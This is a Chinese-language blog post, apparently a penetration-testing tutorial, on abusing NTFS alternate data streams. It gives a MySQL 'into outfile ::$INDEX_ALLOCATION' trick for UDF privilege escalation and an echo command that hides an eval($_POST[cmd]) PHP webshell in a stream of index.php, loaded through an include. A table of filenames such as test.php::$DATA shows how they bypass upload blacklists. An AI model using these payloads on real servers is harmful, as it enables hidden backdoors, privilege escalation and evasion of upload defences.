所有的文件在NTFS上都至少包括一个流-主流,即是我们平常看到可以存数据的文件。一个流的全名包括下面三个部分:<文件名>:<流名>:<流类型>
流在渗透中比较实用的有这几个方面:
top1:在udf提权中,mysql在5.1版本下udf直接导入c:/windows下就行,在5.1版本以上要导入mysql目录下的lib\plugin\目录,又5.1版本在安装时候默认没有lib\plugin目录的,除非你安装的是完整版(官方的那种200多M的)。所以可以用ADS流来创建目录,就绕过了这个限制。例如:
select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION'; select 'xxx' into outfile 'D:\\mysql\\lib\\plugins::$INDEX_ALLOCATION';
我用的是win2003和mysql5.3.10测试失败,应该是高版本mysql限制了流的使用,估计只能在5.1版本左右可以用。
top2:在webshell中的使用,在服务器上echo一个数据流文件到正常网页上。比如
<pre name="code" class="html">echo ^<?php eval($_POST[cmd])?^> >index.php:hidden.txt
上,index网页会正常显示,就是会多了一个流文件,我们用上传一个正常的php文件,文件包含内容是
<pre name="code" class="html"><?php include('index.php:hidden.txt')?>
一句话便被包含进来了,达到了隐蔽的效果。
top3:绕过黑名单验证
在测试中我们发现,如果上传的文件名字为:test.php::$DATA,会在服务器上生成一个test.php的文件,其中内容和所上传文件内容相同,并被解析。假设我们需要上传的文件内容为:<?php phpinfo();?>下面是上传是会出现的现象:
上传的文件名 服务器表面现象 生成的文件内容
<pre name="code" class="html">Test.php:a.jpg 生成Test.php 空 Test.php::$DATA 生成test.php <?php phpinfo();?> Test.php::$INDEX_ALLOCATION 生成test.php文件夹 Test.php::$DATA\0.jpg 生成0.jpg <?php phpinfo();?> Test.php::$DATA\aaa.jpg 生成aaa.jpg <?php phpinfo();?>
PS: 上传test.php:a.jpg的时候其实是在服务器上正常生成了一个数据流文件,可以通过notepad test.php:a.jpg查看内容,而test.php为空也是正常的。 根据第二个现象,我们可以bypass一些黑名单验证。 后面我加\0测试的时候是想截断后面的东西,但是发现windows会无视”/””\”这两个符号前面的东西,只识别这俩符号后的字符串。(由于windows把\ /当成了目录,而上传只认识文件名所导致的)
4069
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
